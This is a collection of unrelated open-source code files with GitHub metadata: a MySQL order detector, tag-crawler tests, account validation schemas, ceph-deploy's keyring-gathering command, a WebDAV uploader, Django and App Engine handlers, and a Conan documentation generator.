prepData = (
o_Data['mID'], c_id, shAid, shPhid,
o_Data['magTime'], rTime, 'revocated')
MySQL_c.execute(
"""INSERT INTO orders (magento_id, customer_id, shipping_address_id,
shipping_phone_id, magento_time, orsys_reg_time, status) VALUES(%s, %s,
%s, %s, %s, %s, %s)""", prepData)
o_id = MySQL_c.lastrowid
db.commit()
db.close()
return o_id
def getCustomerID(firstName, lastName, email, shPhid, shAid):
"""Fetches customer id in table customers"""
logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
# for simplification purposes let
# shipping address == billing address
try:
cName = firstName + ' ' + lastName
except TypeError:
cName = 'corrupted'
logging.debug('This is corrupted getCustomerID name in %s order', o_id)
db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
MySQL_c = db.cursor()
MySQL_c.execute(
"""SELECT id from customers WHERE customer_name=%s AND email=%s""",
(cName, email))
try:
cID = MySQL_c.fetchone()[0]
except:
MySQL_c.execute(
"""INSERT INTO customers (customer_name, email, phone_num_id,
billing_address_id, shipping_address_id)
VALUES(%s, %s, %s, %s, %s)""",
(cName, email, shPhid, shAid, shAid))
cID = MySQL_c.lastrowid
db.commit()
db.close()
return cID
def processOrder(o_id, p_Data):
"""Order products data insertion into OrSys DB"""
db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
MySQL_c = db.cursor()
for i in p_Data:
sku, qty_ordered, price, name = i
pID = getProductID(sku, name)
MySQL_c.execute(
"""INSERT INTO order_composition (order_id, product_id, price,
qty) VALUES(%s, %s, %s, %s)""", (o_id, pID, price,
qty_ordered))
db.commit()
db.close()
return True
def getProductID(sku, name):
"""Retrieves product ID by SKU"""
logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
db = MySQLdb.connect(passwd=db_password, db=db_name, user='orsys')
MySQL_c = db.cursor()
MySQL_c.execute(
"""SELECT id FROM products WHERE sku=%s""", (sku,))
try:
pID = MySQL_c.fetchone()[0]
# synonym detection:
MySQL_c.execute(
"""SELECT item_name FROM products WHERE id=%s""", (pID,))
itemName = MySQL_c.fetchone()[0]
if name != itemName:
msg = "Synonym detecded. Product with id %s have an old \
name: %s and a new one: %s" % (pID, itemName, name)
logging.debug(msg)
except:
MySQL_c.execute(
"""INSERT INTO products (item_name, sku) VALUES(%s, %s)""",
(name, sku))
pID = MySQL_c.lastrowid
db.commit()
db.close()
return pID
# Detector itself:
lastOid = int(getLastOid()) + 1
while check_new_orders(lastOid): # there is (are) new orders there
logging.basicConfig(filename='logs/detector.log', level=logging.DEBUG)
oData, pDataSet = getFreshOrderDataSet(lastOid)
newOID = insertOrder(oData)
logging.debug("New order No %s was detected." % (newOID,))
processOrder(newOID, pDataSet)
lastOid = lastOid + 1
|
{
"content_hash": "e9261076086bc4fed894cf976e09a9a3",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 79,
"avg_line_length": 35.90865384615385,
"alnum_prop": 0.6209666622037756,
"repo_name": "0--key/lib",
"id": "b901031bd027183f096435e1372ae9185be90a1d",
"size": "7469",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "portfolio/2013_OrSys/detector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "28210"
},
{
"name": "Emacs Lisp",
"bytes": "76390"
},
{
"name": "HTML",
"bytes": "1136671"
},
{
"name": "JavaScript",
"bytes": "27718"
},
{
"name": "PHP",
"bytes": "378537"
},
{
"name": "Python",
"bytes": "1892998"
},
{
"name": "Shell",
"bytes": "4030"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, unicode_literals
import mock
import avalon.log
import avalon.tags.read
import avalon.tags.crawl
class DummyWalk(object):
"""Dummy implementation of os.walk that allows us to return \
some exact list of files
"""
def __init__(self, files):
self._files = files
def __call__(self, root, *args, **kwargs):
yield root, '', self._files
class TestTagCrawler(object):
def test_get_tags_io_error(self):
"""Test that exceptions when loading tags are dealt with quietly"""
loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
files = ['path.ogg', 'path2.ogg']
loader.get_from_path.side_effect = [IOError("OH NOES"), IOError("OH NOES")]
crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
out = crawler.get_tags()
assert 0 == len(out)
def test_get_tags_io_error_unicode_error_message(self):
"""Test that exceptions when loading tags are dealt with quietly and \
unicode characters in error messages don't cause encoding issues.
"""
loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
files = ['path.ogg', 'path2.ogg']
loader.get_from_path.side_effect = [IOError('OH NOES! Verás'), IOError('OH NOES! Verás')]
crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
out = crawler.get_tags()
assert 0 == len(out)
def test_get_tags_value_error(self):
""" Test that exceptions when parsing tags are dealt with quietly"""
loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
files = ['path.ogg', 'path2.ogg']
loader.get_from_path.side_effect = [ValueError("OH NOES"), ValueError("OH NOES")]
crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
out = crawler.get_tags()
assert 0 == len(out)
def test_get_tags_value_error_unicode_error_message(self):
""" Test that exceptions when parsing tags are dealt with quietly and \
unicode characters in error messages don't cause encoding issues.
"""
loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
files = ['path.ogg', 'path2.ogg']
loader.get_from_path.side_effect = [
ValueError("OH NOES! There's a problem in Düsseldorf!"),
ValueError("OH NOES! There's a problem in Düsseldorf!")]
crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
out = crawler.get_tags()
assert 0 == len(out)
def test_get_tags_success(self):
"""Test tags can be crawled when tags are able to be loaded correctly"""
loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
files = ['path.ogg', 'path2.ogg']
loader.get_from_path.side_effect = [None, None]
crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
out = crawler.get_tags()
assert 2 == len(out)
|
{
"content_hash": "d38f98cbf7bb9a7a7ff39100a4acf534",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 97,
"avg_line_length": 36.493975903614455,
"alnum_prop": 0.6368438428524266,
"repo_name": "tshlabs/avalonms",
"id": "d9ddd7ebf5f55f7d43b9003093b86510add85872",
"size": "3060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_tag_crawl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "244058"
}
],
"symlink_target": ""
}
|
from pylons.util import _
from formencode import Schema, validators, ForEach, All
from ispmanccp.models.validators import *
__all__ = ['AccountUpdate', 'AccountDelete', 'AccountCreate']
try:
import DNS
dns_available = True
except ImportError:
dns_available = False
class AccountUpdate(Schema):
allow_extra_fields = True
filter_extra_fields = True
ispmanDomain = validators.UnicodeString(not_empty=True, encoding='UTF-8')
uid = validators.UnicodeString(not_empty=True, encoding='UTF-8')
givenName = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
sn = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
userPassword = SecurePassword(
not_empty=True, strip=True,
messages={'empty': _("Please enter a value or click button to restore password")}
)
userPasswordConfirm = PasswordsMatch(not_empty=False, strip=True)
FTPQuotaMBytes = validators.Int(not_empty=False, strip=True)
FTPStatus = validators.OneOf([u'enabled', u'disabled'])
mailQuota = validators.Int(not_empty=False, strip=True)
mailAlias = ForEach(ValidMailAlias(not_empty=True, strip=True))
mailForwardingAddress = ForEach(
validators.Email(not_empty=True,
strip=True,
resolve_domain=dns_available)
)
ForwardingOnly = ForwardingOnlyValidator(not_empty=True)
class AccountDelete(Schema):
allow_extra_fields = True
filter_extra_fields = True
ispmanDomain = validators.UnicodeString(not_empty=True, encoding='UTF-8')
uid = validators.UnicodeString(not_empty=True, encoding='UTF-8')
class AccountCreate(Schema):
allow_extra_fields = True
filter_extra_fields = True
ispmanDomain = validators.UnicodeString(not_empty=True, encoding='UTF-8')
uid = validators.UnicodeString(not_empty=True, encoding='UTF-8')
givenName = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
sn = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
userPassword = SecurePassword(
not_empty=True, strip=True,
messages={'empty': _("Please enter a value or click button to regenerate password")}
)
ispmanUserId = UniqueUserId(not_empty=True, strip=True, encoding='UTF-8')
FTPQuotaMBytes = validators.Int(not_empty=False, strip=True)
FTPStatus = validators.OneOf([u'enabled', u'disabled'])
mailQuota = validators.Int(not_empty=False, strip=True)
mailAlias = ForEach(ValidMailAlias(not_empty=True, strip=True))#, unique=True)
mailForwardingAddress = ForEach(
validators.Email(not_empty=True,
strip=True,
resolve_domain=dns_available)
)
|
{
"content_hash": "314127de326edde66f2d48dacf063838",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 92,
"avg_line_length": 42.10769230769231,
"alnum_prop": 0.6945560833028863,
"repo_name": "UfSoft/python-perl",
"id": "407ac48232cb38f613de1a6061d60dcbad837265",
"size": "3520",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ispmanccp/models/accounts.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "76401"
},
{
"name": "C++",
"bytes": "361"
},
{
"name": "CSS",
"bytes": "9225"
},
{
"name": "HTML",
"bytes": "44331"
},
{
"name": "JavaScript",
"bytes": "4229"
},
{
"name": "Perl",
"bytes": "36737"
},
{
"name": "Prolog",
"bytes": "4319"
},
{
"name": "Python",
"bytes": "118494"
}
],
"symlink_target": ""
}
|
import os.path
import logging
import json
import tempfile
import shutil
import time
from ceph_deploy import hosts
from ceph_deploy.cliutil import priority
from ceph_deploy.lib import remoto
import ceph_deploy.util.paths.mon
LOG = logging.getLogger(__name__)
def _keyring_equivalent(keyring_one, keyring_two):
"""
Check two keyrings are identical
"""
def keyring_extract_key(file_path):
"""
Cephx keyring files may or may not have white space before some lines.
They may have some values in quotes, so a safe way to compare is to
extract the key.
"""
with open(file_path) as f:
for line in f:
content = line.strip()
if len(content) == 0:
continue
split_line = content.split('=')
if split_line[0].strip() == 'key':
return "=".join(split_line[1:]).strip()
raise RuntimeError("File '%s' is not a keyring" % file_path)
key_one = keyring_extract_key(keyring_one)
key_two = keyring_extract_key(keyring_two)
return key_one == key_two
def keytype_path_to(args, keytype):
"""
Get the local filename for a keyring type
"""
if keytype == "admin":
return '{cluster}.client.admin.keyring'.format(
cluster=args.cluster)
if keytype == "mon":
return '{cluster}.mon.keyring'.format(
cluster=args.cluster)
return '{cluster}.bootstrap-{what}.keyring'.format(
cluster=args.cluster,
what=keytype)
def keytype_identity(keytype):
"""
Get the keyring identity from keyring type.
This is used in authentication with keyrings and generating keyrings.
"""
ident_dict = {
'admin' : 'client.admin',
'mds' : 'client.bootstrap-mds',
'osd' : 'client.bootstrap-osd',
'rgw' : 'client.bootstrap-rgw',
'mon' : 'mon.'
}
return ident_dict.get(keytype, None)
def keytype_capabilities(keytype):
"""
Get the capabilities of a keyring from keyring type.
"""
cap_dict = {
'admin' : [
'osd', 'allow *',
'mds', 'allow *',
'mon', 'allow *'
],
'mds' : [
'mon', 'allow profile bootstrap-mds'
],
'osd' : [
'mon', 'allow profile bootstrap-osd'
],
'rgw': [
'mon', 'allow profile bootstrap-rgw'
]
}
return cap_dict.get(keytype, None)
def gatherkeys_missing(args, distro, rlogger, keypath, keytype, dest_dir):
"""
Get or create the keyring from the mon using the mon keyring by keytype and
copy to dest_dir
"""
arguments = [
'/usr/bin/ceph',
'--connect-timeout=25',
'--cluster={cluster}'.format(
cluster=args.cluster),
'--name', 'mon.',
'--keyring={keypath}'.format(
keypath=keypath),
'auth', 'get-or-create',
]
identity = keytype_identity(keytype)
if identity is None:
raise RuntimeError('Could not find identity for keytype:%s' % keytype)
arguments.append(identity)
capabilites = keytype_capabilities(keytype)
if capabilites is None:
raise RuntimeError('Could not find capabilites for keytype:%s' % keytype)
arguments.extend(capabilites)
out, err, code = remoto.process.check(
distro.conn,
arguments
)
if code != 0:
rlogger.error('"ceph auth get-or-create for keytype %s returned %s', keytype, code)
for line in err:
rlogger.debug(line)
return False
keyring_name_local = keytype_path_to(args, keytype)
keyring_path_local = os.path.join(dest_dir, keyring_name_local)
with open(keyring_path_local, 'wb') as f:
for line in out:
f.write(line + b'\n')
return True
def gatherkeys_with_mon(args, host, dest_dir):
"""
Connect to mon and gather keys if mon is in quorum.
"""
distro = hosts.get(host, username=args.username)
remote_hostname = distro.conn.remote_module.shortname()
dir_keytype_mon = ceph_deploy.util.paths.mon.path(args.cluster, remote_hostname)
path_keytype_mon = "%s/keyring" % (dir_keytype_mon)
mon_key = distro.conn.remote_module.get_file(path_keytype_mon)
if mon_key is None:
LOG.warning("No mon key found in host: %s", host)
return False
mon_name_local = keytype_path_to(args, "mon")
mon_path_local = os.path.join(dest_dir, mon_name_local)
with open(mon_path_local, 'wb') as f:
f.write(mon_key)
rlogger = logging.getLogger(host)
path_asok = ceph_deploy.util.paths.mon.asok(args.cluster, remote_hostname)
out, err, code = remoto.process.check(
distro.conn,
[
"/usr/bin/ceph",
"--connect-timeout=25",
"--cluster={cluster}".format(
cluster=args.cluster),
"--admin-daemon={asok}".format(
asok=path_asok),
"mon_status"
]
)
if code != 0:
rlogger.error('"ceph mon_status %s" returned %s', host, code)
for line in err:
rlogger.debug(line)
return False
try:
mon_status = json.loads(b''.join(out).decode('utf-8'))
except ValueError:
rlogger.error('"ceph mon_status %s" output was not json', host)
for line in out:
rlogger.error(line)
return False
mon_number = None
mon_map = mon_status.get('monmap')
if mon_map is None:
rlogger.error("could not find mon map for mons on '%s'", host)
return False
mon_quorum = mon_status.get('quorum')
if mon_quorum is None:
rlogger.error("could not find quorum for mons on '%s'" , host)
return False
mon_map_mons = mon_map.get('mons')
if mon_map_mons is None:
rlogger.error("could not find mons in monmap on '%s'", host)
return False
for mon in mon_map_mons:
if mon.get('name') == remote_hostname:
mon_number = mon.get('rank')
break
if mon_number is None:
rlogger.error("could not find '%s' in monmap", remote_hostname)
return False
if not mon_number in mon_quorum:
rlogger.error("Not yet quorum for '%s'", host)
return False
for keytype in ["admin", "mds", "osd", "rgw"]:
if not gatherkeys_missing(args, distro, rlogger, path_keytype_mon, keytype, dest_dir):
# We will return failure if we fail to gather any key
rlogger.error("Failed to return '%s' key from host ", keytype, host)
return False
return True
def gatherkeys(args):
"""
Gather keys from any mon and store in current working directory.
Backs up keys from previous installs and stores new keys.
"""
oldmask = os.umask(0o77)
try:
try:
tmpd = tempfile.mkdtemp()
LOG.info("Storing keys in temp directory %s", tmpd)
sucess = False
for host in args.mon:
sucess = gatherkeys_with_mon(args, host, tmpd)
if sucess:
break
if not sucess:
LOG.error("Failed to connect to host:%s" ,', '.join(args.mon))
raise RuntimeError('Failed to connect any mon')
had_error = False
date_string = time.strftime("%Y%m%d%H%M%S")
for keytype in ["admin", "mds", "mon", "osd", "rgw"]:
filename = keytype_path_to(args, keytype)
tmp_path = os.path.join(tmpd, filename)
if not os.path.exists(tmp_path):
LOG.error("No key retrived for '%s'" , keytype)
had_error = True
continue
if not os.path.exists(filename):
LOG.info("Storing %s" % (filename))
shutil.move(tmp_path, filename)
continue
if _keyring_equivalent(tmp_path, filename):
LOG.info("keyring '%s' already exists" , filename)
continue
backup_keyring = "%s-%s" % (filename, date_string)
LOG.info("Replacing '%s' and backing up old key as '%s'", filename, backup_keyring)
shutil.copy(filename, backup_keyring)
shutil.move(tmp_path, filename)
if had_error:
raise RuntimeError('Failed to get all key types')
finally:
LOG.info("Destroy temp directory %s" %(tmpd))
shutil.rmtree(tmpd)
finally:
os.umask(oldmask)
@priority(40)
def make(parser):
"""
Gather authentication keys for provisioning new nodes.
"""
parser.add_argument(
'mon',
metavar='HOST',
nargs='+',
help='monitor host to pull keys from',
)
parser.set_defaults(
func=gatherkeys,
)
|
{
"content_hash": "0228a26fc7df2814cada00e764558746",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 99,
"avg_line_length": 33.60820895522388,
"alnum_prop": 0.5620073276340624,
"repo_name": "SUSE/ceph-deploy",
"id": "656e89c614eab22c1a25bace02618a9502ee673e",
"size": "9007",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceph_deploy/gatherkeys.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "392237"
},
{
"name": "Shell",
"bytes": "8614"
}
],
"symlink_target": ""
}
|
import argparse
import webdavtools
parser = argparse.ArgumentParser(description='WebDav upload processing.')
# List of files (required)
parser.add_argument( 'files',
metavar='File',
type=str,
nargs='+',
help='Multiple files, source and target divided by a colon '
'from:to. Directories have to end with a slash. File '
'patterns are allowed. Example: ~/Desktop/test/*.txt:/test/ '
'(will copy all txt-files from folder ~/Desktop/test/ to '
'/test/ on the WebDav server.')
# The url (required)
parser.add_argument( '--url',
dest='url',
help='The URL.',
required=True)
# Username (optional)
parser.add_argument( '--username',
dest='username',
help='The username.')
# Password (optional)
parser.add_argument( '--password',
dest='password',
help='The password.')
# Parse all arguments. Will be available in the "args" namespace
args = parser.parse_args()
# Connect to WebDav with given credentials
webDavTools = webdavtools.WebDavTools()
webDavTools.connect(args.url, args.username, args.password)
# Upload files
for sourceAndTarget in args.files:
# Files have to be devided by ":", e.g. "/my/local/file/from.txt:/my/remote/file/to.txt"
sourceAndTargetSplitted = sourceAndTarget.split(':')
if len(sourceAndTargetSplitted) != 2:
raise Exception("Invalid file argument!")
source = sourceAndTargetSplitted[0]
target = sourceAndTargetSplitted[1]
webDavTools.upload(source, target)
|
{
"content_hash": "3c3f65f3635d02e71254b5d6118c084c",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 92,
"avg_line_length": 35.431372549019606,
"alnum_prop": 0.5683453237410072,
"repo_name": "thorbenegberts/webdav-tools",
"id": "9b7ee8a43d5540f9748c8f6591e39e20a22ed663",
"size": "1807",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webdav_upload.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3886"
}
],
"symlink_target": ""
}
|
import glanceclient.exc as glance_exceptions
from keystoneclient import exceptions as keystone_exceptions
from novaclient import exceptions as nova_exceptions
from quantumclient.common import exceptions as quantum_exceptions
from swiftclient import client as swift_exceptions
from cinderclient import exceptions as cinder_exceptions
from .utils import TestDataContainer
def create_stubbed_exception(cls, status_code=500):
msg = "Expected failure."
def fake_init_exception(self, code, message, **kwargs):
self.code = code
self.message = message
def fake_str(self):
return str(self.message)
def fake_unicode(self):
return unicode(self.message)
cls.__init__ = fake_init_exception
cls.__str__ = fake_str
cls.__unicode__ = fake_unicode
cls.silence_logging = True
return cls(status_code, msg)
def data(TEST):
TEST.exceptions = TestDataContainer()
unauth = keystone_exceptions.Unauthorized
TEST.exceptions.keystone_unauthorized = create_stubbed_exception(unauth)
keystone_exception = keystone_exceptions.ClientException
TEST.exceptions.keystone = create_stubbed_exception(keystone_exception)
nova_exception = nova_exceptions.ClientException
TEST.exceptions.nova = create_stubbed_exception(nova_exception)
glance_exception = glance_exceptions.ClientException
TEST.exceptions.glance = create_stubbed_exception(glance_exception)
quantum_exception = quantum_exceptions.QuantumClientException
TEST.exceptions.quantum = create_stubbed_exception(quantum_exception)
swift_exception = swift_exceptions.ClientException
TEST.exceptions.swift = create_stubbed_exception(swift_exception)
cinder_exception = cinder_exceptions.BadRequest
TEST.exceptions.cinder = create_stubbed_exception(cinder_exception)
|
{
"content_hash": "43508c6504c95ee3be7284ef814f663a",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 76,
"avg_line_length": 34.490566037735846,
"alnum_prop": 0.7603938730853391,
"repo_name": "99cloud/keystone_register",
"id": "9f58692033738ff266a9b25ef9e8001216729409",
"size": "2433",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "openstack_dashboard/test/test_data/exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "268926"
},
{
"name": "Python",
"bytes": "1535870"
},
{
"name": "Shell",
"bytes": "12674"
}
],
"symlink_target": ""
}
|
import json
import logging
import urlparse
from google.appengine.api import search
try:
from config import secret_token
except ImportError:
secret_token = ''
INDEX = search.Index(name="nuts")
NO_RESPONSE_SENT = object()
def send_json(start_response, status, headers, data):
res = ''
if data is not None:
res = json.dumps(data)
headers.append(("Content-Type", "application/json"))
headers.append(("Content-Length", str(len(res))))
start_response(status, headers)
return res
def check_method(environ, start_response, expected_method):
if environ["REQUEST_METHOD"].upper() != expected_method:
response = {"Message": "405 Method Not Allowed: use %s" % expected_method}
return send_json(start_response, "405 Method Not Allowed", [("Allow", expected_method)], response)
return NO_RESPONSE_SENT
def check_secret_token(environ, start_response):
try:
token = urlparse.parse_qs(environ["QUERY_STRING"])["token"][0]
if token != secret_token:
raise KeyError(token)
except (KeyError, IndexError) as e:
logging.warning("Bad token: %r", e)
response = {"Message": "403 Forbidden: bad token"}
return send_json(start_response, "403 Forbidden", [], response)
return NO_RESPONSE_SENT
def find(environ, start_response):
"""
Search nuts.
Input: q.
Output:
{
"Message": "OK",
"Nuts": [
{
"Vendor": "aleksi",
"Name": "test_nut1"
}
]
}
"""
res = check_method(environ, start_response, "GET")
if res is not NO_RESPONSE_SENT:
return res
try:
q = urlparse.parse_qs(environ["QUERY_STRING"])["q"][0]
except (KeyError, IndexError) as e:
logging.warning("Bad request: %r", e)
return send_json(start_response, "400 Bad Request", [], {"Message": "400 Bad Request: %r" % e})
results = INDEX.search(q)
response = {"Nuts": []}
for res in results:
nut = {"Rank": res.rank}
for f in res.fields:
nut[f.name] = f.value
response["Nuts"].append(nut)
response["Message"] = "OK"
return send_json(start_response, "200 OK", [], response)
def add(environ, start_response):
"""
Add nut to search index.
Input:
{
"Nut": {
"Vendor": "aleksi",
"Name": "test_nut1",
"Doc": "Package test_nut1 is used to test nut."
}
}
"""
res = check_method(environ, start_response, "POST")
if res is NO_RESPONSE_SENT:
res = check_secret_token(environ, start_response)
if res is not NO_RESPONSE_SENT:
return res
data = json.load(environ["wsgi.input"])
logging.info("Adding %r", data)
vendor = data["Nut"]["Vendor"]
name = data["Nut"]["Name"]
doc = data["Nut"]["Doc"]
if doc.lower().startswith("package %s " % name.lower()):
doc = " ".join(doc.split(" ")[2:])
if doc.endswith("."):
doc = doc[:-1]
# TODO rank
fields = [
search.TextField(name="Vendor", value=vendor),
search.TextField(name="Name", value=name),
search.TextField(name="Doc", value=doc),
]
doc_id = "%s/%s" % (vendor, name)
d = search.Document(doc_id=doc_id, fields=fields)
INDEX.put(d)
return send_json(start_response, "201 Created", [], {"Message": "OK"})
def remove(environ, start_response):
"""
Remove nut from search index.
Input:
{
"Nut": {
"Vendor": "aleksi",
"Name": "test_nut1"
}
}
"""
res = check_method(environ, start_response, "POST")
if res is NO_RESPONSE_SENT:
res = check_secret_token(environ, start_response)
if res is not NO_RESPONSE_SENT:
return res
data = json.load(environ["wsgi.input"])
logging.info("Removing %r", data)
vendor = data["Nut"]["Vendor"]
name = data["Nut"]["Name"]
doc_id = "%s/%s" % (vendor, name)
INDEX.delete(doc_id)
return send_json(start_response, '204 No Content', [], None)
def remove_all(environ, start_response):
while True:
doc_ids = [doc.doc_id for doc in INDEX.get_range(ids_only=True)]
if not doc_ids:
break
logging.info("Removing IDs %r", doc_ids)
INDEX.delete(doc_ids)
return send_json(start_response, '204 No Content', [], None)
|
{
"content_hash": "b5c37a8b87e811b630715066ee3a0c88",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 106,
"avg_line_length": 26.07017543859649,
"alnum_prop": 0.5708838043965904,
"repo_name": "AlekSi/search.gonuts.io",
"id": "649d047154cb2d93357ba739f273a95a3e491bcb",
"size": "4458",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "search.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "4458"
}
],
"symlink_target": ""
}
|
from django.shortcuts import get_object_or_404
from django.views.generic import list_detail
from libros.bookreader.models import Collection
def browse(request, **kwargs):
kwargs.setdefault('template_object_name','collection')
kwargs.setdefault('queryset', Collection.objects.all())
return list_detail.object_list(request, **kwargs)
def view(request, object_id, **kwargs):
collection = get_object_or_404(Collection, pk=object_id)
kwargs.setdefault('template_object_name','book')
kwargs.setdefault('template_name', 'bookreader/collection_detail.html')
kwargs.setdefault('queryset', collection.books.all())
kwargs.setdefault('extra_context', {})
kwargs['extra_context']['collection'] = collection
return list_detail.object_list(request, **kwargs)
|
{
"content_hash": "793071f64f2d425b86bcedc089843d8b",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 75,
"avg_line_length": 36.31818181818182,
"alnum_prop": 0.7296620775969962,
"repo_name": "Early-Modern-OCR/Cobre",
"id": "52c708209287870cdd2b7eff8f82d2c4e88df735",
"size": "799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libros/bookreader/views/collection.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "101965"
},
{
"name": "HTML",
"bytes": "129761"
},
{
"name": "JavaScript",
"bytes": "233511"
},
{
"name": "Python",
"bytes": "219455"
}
],
"symlink_target": ""
}
|
from sense_hat import SenseHat
from time import sleep
sense = SenseHat()
sense.clear()
|
{
"content_hash": "e1c5ecdcf4762e3b56edd9d49b543e1b",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 30,
"avg_line_length": 14.833333333333334,
"alnum_prop": 0.7640449438202247,
"repo_name": "claremacrae/raspi_code",
"id": "9d3bcd8349d101063fcccb536acc5ae66f8d92ba",
"size": "194",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hardware/sense_hat/turn_off_lights.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "MATLAB",
"bytes": "61"
},
{
"name": "Mathematica",
"bytes": "435"
},
{
"name": "Python",
"bytes": "33532"
},
{
"name": "Shell",
"bytes": "10124"
}
],
"symlink_target": ""
}
|
from django.conf.urls import include, url
from viewflow.flow.viewset import FlowViewSet
from . import flows, views
urlpatterns = [
url(
r'^(?P<process_pk>\d+)/(?P<task_pk>\d+)/next/$',
views.NextTaskRedirectView.as_view(),
name='next_task'
),
url(
r'^',
include(FlowViewSet(flows.SubmissionFlow).urls),
),
]
|
{
"content_hash": "34c998e0c9cce6ed657c9ac0db778a9e",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 56,
"avg_line_length": 21.58823529411765,
"alnum_prop": 0.5994550408719346,
"repo_name": "Candihub/pixel",
"id": "aa1a07292fd4f8f8579befa8b08bbc9d3c9fbcaf",
"size": "367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/submission/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "15017"
},
{
"name": "Dockerfile",
"bytes": "1819"
},
{
"name": "HTML",
"bytes": "58864"
},
{
"name": "JavaScript",
"bytes": "1180"
},
{
"name": "Makefile",
"bytes": "4184"
},
{
"name": "Python",
"bytes": "414705"
},
{
"name": "R",
"bytes": "3817"
},
{
"name": "Shell",
"bytes": "2928"
}
],
"symlink_target": ""
}
|
import os
import platform
import subprocess
import sys
folder = {
"install": "consumer",
"config": "consumer",
"get": "consumer",
"info": "consumer",
"search": "consumer",
"new": "creator",
"create": "creator",
"upload": "creator",
"export": "creator",
"export-pkg": "creator",
"test": "creator",
"source": "development",
"build": "development",
"package": "development",
"editable": "development",
"workspace": "development",
"profile": "misc",
"remote": "misc",
"user": "misc",
"imports": "misc",
"copy": "misc",
"remove": "misc",
"alias": "misc",
"download": "misc",
"inspect": "misc",
"help": "misc",
"lock": "misc",
}
experimental = ["inspect"]
commands = folder.keys()
conan_name = ""
try:
conan_name = sys.argv[1]
except IndexError:
conan_name = "conan"
template = """.. _conan_{0}:
conan {0}
======{1}
{2}
.. code-block:: bash
$ {3}
{4}
.. code-block:: text
{5}"""
for command in commands:
execute = [conan_name, command, "-h"]
print(execute)
output = str(subprocess.check_output(execute))
output = output.rstrip()
search_string = "conan %s [-h]" % command
output = search_string + output.split(search_string)[1]
output = output.split("\\r\\n\\r\\n" if platform.system() == "Windows" else "\\n\\n", 2)
underline = ""
for char in command:
underline += "="
small_help = ""
for line in output[0].replace("\\r", "").replace("\\n", "\n").splitlines():
if not line.startswith("conan"):
line = line[1:]
small_help += "%s\n" % line.rstrip()
text_help = output[1].replace("\\r", "").replace("\\n", "\n").rstrip()
if output[2].startswith("positional arguments"):
args_text = output[2]
else:
tmp = output[2].split("positional arguments")
text_help += "\n\n" + tmp[0].replace("\\r", "").replace("\\n", "\n").rstrip()
args_text = "positional arguments" + tmp[1]
arguments_help = ""
for line in args_text.replace("\\r", "").replace("\\n", "\n").splitlines():
if line == "'" or line == "\"":
continue
arguments_help += (" %s\n" % line) if line else "\n"
arguments_help = arguments_help.rstrip()
print(arguments_help)
text_experimental = """
.. warning::
This is an **experimental** feature subject to breaking changes in future releases.
""" if command in experimental else ""
text = template.format(command, underline, text_experimental, small_help, text_help,
arguments_help)
text = text.replace("\\'", "\'")
filepath = os.path.join(os.path.dirname(os.path.realpath(__file__)), "reference", "commands",
folder[command], command)
print("filepath:", filepath)
the_file = open("%s.rst" % filepath, "r")
content = the_file.read()
the_file.close()
the_file = open("%s.rst" % filepath, "w")
separator = "\n\n\n"
begin = content.find(".. _conan_%s" % command) # To avoid deleting ..spelling:: and other stuff
prev_content = content[0:begin]
rest_content = content[begin + 1:]
if rest_content:
rest_content = rest_content.split(separator, 1)
if len(rest_content) > 1:
the_file.write(prev_content + text + separator + rest_content[1])
else:
raise Exception("Separator (two consecutive newlines) not found")
else:
the_file.write(text)
